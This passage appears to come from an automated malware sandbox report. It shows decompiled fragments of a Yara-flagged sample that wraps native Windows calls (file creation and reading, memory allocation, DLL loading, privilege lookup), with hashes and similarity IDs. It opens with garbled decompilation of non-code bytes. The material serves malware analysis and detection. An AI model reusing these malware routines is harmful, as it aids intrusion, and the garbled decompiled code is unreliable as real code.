                        				_t76 = _t75 ^  *_t75;
                        				 *_t76 =  *_t76 + _t76;
                        				 *((intOrPtr*)(_t96 + 0x10044400)) =  *((intOrPtr*)(_t96 + 0x10044400)) + _t76;
                        				 *_t96 =  *_t96 + _t91;
                        				 *((intOrPtr*)(_t109 + _t120)) =  *((intOrPtr*)(_t109 + _t120)) + _t96;
                        				 *_t76 =  *_t76 + 0x28f041e;
                        				asm("outsb");
                        				_t77 = _t76 ^ 0x00000000;
                        				 *_t77 =  *_t77 + _t77;
                        				 *((intOrPtr*)(_t96 + 0x60aba00)) =  *((intOrPtr*)(_t96 + 0x60aba00)) + _t77;
                        				 *_t109 =  *_t109 + _t91;
                        				 *((intOrPtr*)(_t77 + 0x34)) =  *((intOrPtr*)(_t77 + 0x34)) + _t77;
                        				 *((intOrPtr*)(_t96 + 0x1d08bd00)) =  *((intOrPtr*)(_t96 + 0x1d08bd00)) + _t77;
                        				_push(es);
                        				 *(_t77 + _t77) =  *(_t77 + _t77) << 1;
                        				 *_t77 =  *_t77 + _t77;
                        				_t80 =  &(( &((_t77 + _t77)[_t91]))[0x3c0015]);
                        				 *0 =  *0 | _t109;
                        				 *_t80 =  *_t80 + 0x6250e8e;
                        				 *_t80 =  &(_t80[ *_t80]);
                        				 *((intOrPtr*)(_t96 + 0x6145000)) =  *((intOrPtr*)(_t96 + 0x6145000)) + _t80;
                        				 *_t120 =  *_t120 + _t91;
                        				 *_t91 =  *_t91 + _t109;
                        				 *_t80 =  *_t80 + 0x2220064;
                        				 *[ds:edi] =  *[ds:edi] + _t91;
                        				 *_t80 =  *_t80 + 0x222010b;
                        				_t81 =  &(_t80[1]);
                        				 *((intOrPtr*)(_t126 + 0x3d)) =  *((intOrPtr*)(_t126 + 0x3d)) + _t81;
                        				 *_t81 =  *_t81 + _t81;
                        				 *_t81 =  *_t81 + _t81;
                        				 *_t81 =  *_t81 + 0x2220172;
                        				_t110 = _t109 + 1;
                        				 *((intOrPtr*)(_t81 + 0x3d)) =  *((intOrPtr*)(_t81 + 0x3d)) + _t110;
                        				 *_t81 =  *_t81 + _t81;
                        				 *_t81 =  *_t81 + _t81;
                        				 *_t81 =  *_t81 + 0x60017;
                        				_t97 = _t96 + _t110;
                        				 *_t81 =  *_t81 + 0x600f2;
                        				 *_t116 =  *_t116 + _t91;
                        				 *[ds:eax] =  *[ds:eax] + _t81;
                        				 *_t81 =  *_t81 + _t81;
                        				 *_t81 =  *_t81 + 0x62b0073;
                        				 *_t81 =  *_t81 + _t97;
                        				 *[ds:eax] =  *[ds:eax] + _t81;
                        				 *_t81 =  *_t81 + _t81;
                        				 *_t81 = _t97;
                        				_t121 = _t120 - 1;
                        				 *((intOrPtr*)(_t81 + _t81 + 0x40)) =  *((intOrPtr*)(_t81 + _t81 + 0x40)) + _t81;
                        				 *[ds:eax] =  *[ds:eax] + _t81;
                        				 *_t81 =  *_t81 + _t81;
                        				asm("repe or edi, edx");
                        				 *((intOrPtr*)(_t81 + _t81 + 0x58)) =  *((intOrPtr*)(_t81 + _t81 + 0x58)) + _t81;
                        				 *[ds:eax] =  *[ds:eax] + _t81;
                        				 *_t81 =  *_t81 + _t81;
                        				asm("enter 0x3011, 0x6");
                        				 *((intOrPtr*)(_t121 + _t116)) =  *((intOrPtr*)(_t121 + _t116)) + _t91;
                        				_t101 =  *_t81;
                        				_t82 = _t81 | 0x0044063c;
                        				asm("aam 0x3e");
                        				 *_t82 =  *_t82 + _t82;
                        				 *_t82 =  *_t82 + _t82;
                        				_t92 =  *_t82;
                        				 *_t82 = _t91;
                        				asm("adc dl, [eax]");
                        				 *_t92 =  *_t92 - _t82;
                        				 *((intOrPtr*)(_t116 + _t116)) =  *((intOrPtr*)(_t116 + _t116)) + _t82;
                        				 *_t82 =  *_t82 + _t82;
                        				 *_t82 =  *_t82 + _t82;
                        				 *_t82 =  *_t82 + 0x60b27;
                        				 *((intOrPtr*)(_t116 + _t116)) =  *((intOrPtr*)(_t116 + _t116)) + _t101;
                        				_t83 =  *_t82;
                        				 *_t83 = _t82;
                        				_t123 = _t121 + 2;
                        				_t84 =  >=  ?  *_t123 : _t83;
                        				_t85 = ( >=  ?  *_t123 : _t83) + _t92;
                        				_t86 = ( >=  ?  *_t123 : _t83) + _t92 + 1;
                        				 *_t86 =  *_t86 + _t86;
                        				 *_t86 =  *_t86 + _t86;
                        				_t87 =  *_t86;
                        				 *_t87 = _t86;
                        				_push(_t101);
                        				asm("clts");
                        				 *_t101 =  *_t101 + _t101;
                        				asm("adc [ecx], al");
                        				 *_t87 =  *_t87 + _t87;
                        				 *((intOrPtr*)(_t101 + 0x48132600)) =  *((intOrPtr*)(_t101 + 0x48132600)) + _t87;
                        				_push(es);
                        				 *_t87 =  *_t87 + _t110 + _t91;
                        				_t103 = _t101 - 1 + 1;
                        				 *_t87 =  *_t87 + _t87;
                        				 *_t87 =  *_t87 + _t87;
                        				_t88 =  *_t87;
                        				 *_t88 = _t87;
                        				_t125 = _t123 + 1 - 1;
                        				_push(es);
                        				_t89 = _t88 + _t103;
                        				 *_t89 =  *_t89 + _t89;
                        				 *_t89 =  *_t89 + _t89;
                        				 *_t89 = _t103 + 1;
                        				 *0x00000014 =  *((intOrPtr*)(0x14)) + _t89;
                        				 *_t89 =  *_t89 + _t89;
                        				 *((intOrPtr*)(_t125 + 0x3c0ced08)) =  *((intOrPtr*)(_t123 + 1 - 1 + 0x3c0ced08)) + _t89;
                        				_push(es);
                        				_push(_t89);
                        				 *_t89 =  *_t89 + _t92;
                        				 *_t89 =  *_t89 + _t89;
                        				 *_t89 =  *_t89 + _t89;
                        				 *_t89 = _t92;
                        				asm("adc dl, [eax]");
                        				_push(es);
                        				_push(_t89);
                        				 *_t89 =  *_t89 + 0x15;
                        				 *_t89 =  *_t89 + _t89;
                        				 *_t89 =  *_t89 + _t89;
                        				return _t89;
                        			}

                        Memory Dump Source
                        • Source File: 00000000.00000002.361212049.0000000000142000.00000002.00020000.sdmp, Offset: 00140000, based on PE: true
                        • Associated: 00000000.00000002.361201067.0000000000140000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.361225672.000000000014F000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.361257547.000000000015A000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.361346330.00000000001C2000.00000002.00020000.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2987b6f405de08ca06e6db272c9fb6b08d6a727d80afb26aa28982de7a60cea5
                        • Instruction ID: 6edc6100ede1acee5a90859b2af34609da5b0150e2a8f34f54a7a0f4048c6ef1
                        • Opcode Fuzzy Hash: 2987b6f405de08ca06e6db272c9fb6b08d6a727d80afb26aa28982de7a60cea5
                        • Instruction Fuzzy Hash: 4381A76144E3D1AFC75387744CB46827FB0AE53224B6E85EBC4C2CF5A3E25D085AD7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3c92339f1e3eba029f1e64391dac75186ab1367106c1ed5eb4f9604b05997492
                        • Instruction ID: 96748c999561e02a753f2f1d0027e753f90ea0539d7be626e8e72fa1a5c4db95
                        • Opcode Fuzzy Hash: 3c92339f1e3eba029f1e64391dac75186ab1367106c1ed5eb4f9604b05997492
                        • Instruction Fuzzy Hash: 57514C74E013088FDB44EFB5E9946DEBBF6EB84304F04D839D504AB268EB74598ACB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4ac1d3f4fa51c032268d23c7993363ed55d99944917d09e08fcfdb1e801a6de
                        • Instruction ID: 2d47bd03b1522693c37366692826dcc6845e06a137b537bc3f03cae3aaa391a6
                        • Opcode Fuzzy Hash: d4ac1d3f4fa51c032268d23c7993363ed55d99944917d09e08fcfdb1e801a6de
                        • Instruction Fuzzy Hash: 44514C34E013088FDB44EFB5E9946DEBBF6EB84304F04D839D505AB268EB74598ACB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        C-Code - Quality: 37%
                        			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                        				void* _t18;
                        				void* _t27;
                        				intOrPtr* _t28;
                        
                        				_t13 = _a4;
                        				_t28 = _a4 + 0xc48;
                        				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                        				_t6 =  &_a32; // 0x414d32
                        				_t12 =  &_a8; // 0x414d32
                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                        				return _t18;
                        			}

                        APIs
                        • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 2MA$2MA
                        • API String ID: 2738559852-947276439
                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00419D4B(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                        				long _t21;
                        				void* _t32;
                        
                        				asm("in eax, dx");
                        				asm("clc");
                        				asm("rcl byte [ebp-0x75], 0xec");
                        				_t15 = _a4;
                        				_t3 = _t15 + 0xc40; // 0xc40
                        				E0041A950(_t32, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                        				_t11 =  &_a20; // 0x414b77
                        				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                        				return _t21;
                        			}

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: wKA
                        • API String ID: 823142352-3165208591
                        • Opcode ID: 3dfe97fc43ba6ce74f5e4af6aaac8378e2e702818d3680ccd1dad68eb5b3ffef
                        • Instruction ID: 171a81934c3c7c60c337ad403773ace1515801b8f7e3dceb6118aea4b3c41b01
                        • Opcode Fuzzy Hash: 3dfe97fc43ba6ce74f5e4af6aaac8378e2e702818d3680ccd1dad68eb5b3ffef
                        • Instruction Fuzzy Hash: 1201F6B2200109BFCB08CF98DC85EEB77A9AF8C754F15824CFA5D97241C630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                        				long _t21;
                        				void* _t31;
                        
                        				_t3 = _a4 + 0xc40; // 0xc40
                        				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                        				_t11 =  &_a20; // 0x414b77
                        				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                        				return _t21;
                        			}

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: wKA
                        • API String ID: 823142352-3165208591
                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00419F2D(void* __esi, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {
                        				void* _t37;
                        
                        				asm("daa");
                        				_t37 = __esi - 1;
                        				if (_t37 >= 0) goto L3;
                        			}

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 93b34ab001ca49a4dfed7a8792debca3667baccbd67a0a437f6b7862a62b0d36
                        • Instruction ID: 0dfea3d50b55b6264416a61c865fb79426a71bb047c54ae097aa9f51a6ea940a
                        • Opcode Fuzzy Hash: 93b34ab001ca49a4dfed7a8792debca3667baccbd67a0a437f6b7862a62b0d36
                        • Instruction Fuzzy Hash: 990108B1200209AFCB04DF89DC91DEB77ADAF88314F118509FD5897241C634E8618BE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
                        				char* _v8;
                        				struct _EXCEPTION_RECORD _v12;
                        				struct _OBJDIR_INFORMATION _v16;
                        				char _v536;
                        				void* _t15;
                        				struct _OBJDIR_INFORMATION _t17;
                        				struct _OBJDIR_INFORMATION _t18;
                        				void* _t30;
                        				void* _t31;
                        				void* _t32;
                        
                        				_v8 =  &_v536;
                        				_t15 = E0041C640( &_v12, 0x104, _a8);
                        				_t31 = _t30 + 0xc;
                        				if(_t15 != 0) {
                        					_t17 = E0041CA60(__eflags, _v8);
                        					_t32 = _t31 + 4;
                        					__eflags = _t17;
                        					if(_t17 != 0) {
                        						E0041CCE0( &_v12, 0);
                        						_t32 = _t32 + 8;
                        					}
                        					_t18 = E0041AE90(_v8);
                        					_v16 = _t18;
                        					__eflags = _t18;
                        					if(_t18 == 0) {
                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                        						return _v16;
                        					}
                        					return _t18;
                        				} else {
                        					return _t15;
                        				}
                        			}

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00419E7A(void* __eax, void* __esi, intOrPtr _a4, void* _a8) {
                        				long _t10;
                        				void* _t13;
                        
                        				asm("arpl [eax-0x1374aaf0], dx");
                        				_t7 = _a4;
                        				_t2 = _t7 + 0x10; // 0x300
                        				_t3 = _t7 + 0xc50; // 0x40a913
                        				E0041A950(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                        				_t10 = NtClose(_a8);
                        				asm("rcr byte [esi+0x5d], 1");
                        				return _t10;
                        			}

                        APIs
                        • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: b40df1d7741cb8d30f687e5d97e1f84a6941624dcd74f063d41cb2d6739f338d
                        • Instruction ID: 6549781c7089ca072ac01950d1cb3db55a0379d67572cb97e9cbd212e5d13e1f
                        • Opcode Fuzzy Hash: b40df1d7741cb8d30f687e5d97e1f84a6941624dcd74f063d41cb2d6739f338d
                        • Instruction Fuzzy Hash: 62E08C71201210BBE710EBA4CC85ED77B68EF48320F11849AFA2C9B242D630A6408790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E00419E80(void* __esi, intOrPtr _a4, void* _a8) {
                        				long _t8;
                        				void* _t11;
                        
                        				_t5 = _a4;
                        				_t2 = _t5 + 0x10; // 0x300
                        				_t3 = _t5 + 0xc50; // 0x40a913
                        				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                        				_t8 = NtClose(_a8);
                        				asm("rcr byte [esi+0x5d], 1");
                        				return _t8;
                        			}

                        APIs
                        • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                        • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                        • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                        • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                        				void* _t10;
                        				void* _t15;
                        
                        				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                        				_t4 =  &_a16; // 0x414c6f
                        				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                        				return _t10;
                        			}






                        APIs
                        • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: oLA
                        • API String ID: 1279760036-3789366272
                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                        				char _v67;
                        				char _v68;
                        				void* _t12;
                        				intOrPtr* _t13;
                        				int _t14;
                        				long _t21;
                        				intOrPtr* _t25;
                        				void* _t26;
                        				void* _t30;
                        
                        				_t30 = __eflags;
                        				_v68 = 0;
                        				E0041B850( &_v67, 0, 0x3f);
                        				E0041C3F0( &_v68, 3);
                        				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
                        				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                        				_t25 = _t13;
                        				if(_t25 != 0) {
                        					_t21 = _a8;
                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                        					_t32 = _t14;
                        					if(_t14 == 0) {
                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                        					}
                        					return _t14;
                        				}
                        				return _t13;
                        			}













                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                        • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                        • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                        • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A05D(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                        				char _t12;
                        				void* _t17;
                        
                        				_t9 = _a4;
                        				_t3 = _t9 + 0xc74; // 0xc74
                        				E0041A950(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                        				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                        				return _t12;
                        			}






                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 212efc3a55c73a629c9c18641576bceee60b43069c2ed8606f8786b9922b2111
                        • Instruction ID: a87f0deeeefb8015adce61304ab1bd6295ab86bc104810a71bb6deb3e954703d
                        • Opcode Fuzzy Hash: 212efc3a55c73a629c9c18641576bceee60b43069c2ed8606f8786b9922b2111
                        • Instruction Fuzzy Hash: DDE04FB12006056FD714DFA9CC49EE77BA9EF88350F114659F91C97251C631E910CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                        				char _t10;
                        				void* _t15;
                        
                        				_t3 = _a4 + 0xc74; // 0xc74
                        				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                        				return _t10;
                        			}






                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 8fc4e1774a5362d120ab031b8c7bb4455859f6b6d34fb36d0c5de42025429bba
                        • Instruction ID: f999fc605822e425a02ccbc90597ee93ea479b9d775433ea2688004a293f8c07
                        • Opcode Fuzzy Hash: 8fc4e1774a5362d120ab031b8c7bb4455859f6b6d34fb36d0c5de42025429bba
                        • Instruction Fuzzy Hash: BCE09AB02082503BCB10DB258C81EDB3FA8DF89260F18859AF88817202C538A46487B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 7a59bc80923bf4ded264193f4aab42e93d095830751d07d639aef5d5ecc7878a
                        • Instruction ID: fe08283665652ced38bf7f6f3b7d618161e84c27e14499dacb9060dfb59d20e2
                        • Opcode Fuzzy Hash: 7a59bc80923bf4ded264193f4aab42e93d095830751d07d639aef5d5ecc7878a
                        • Instruction Fuzzy Hash: 75E04FB56002046FDB10DF45DC86EE777A9EF88760F018555FE4C5B242D934E9508BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E0041A092(intOrPtr _a4, int _a8) {
                        				void* _t5;
                        				void* _t16;
                        
                        				asm("outsb");
                        				 *0xe61fadb4 = _t5 - 0x61;
                        				_t8 = _a4;
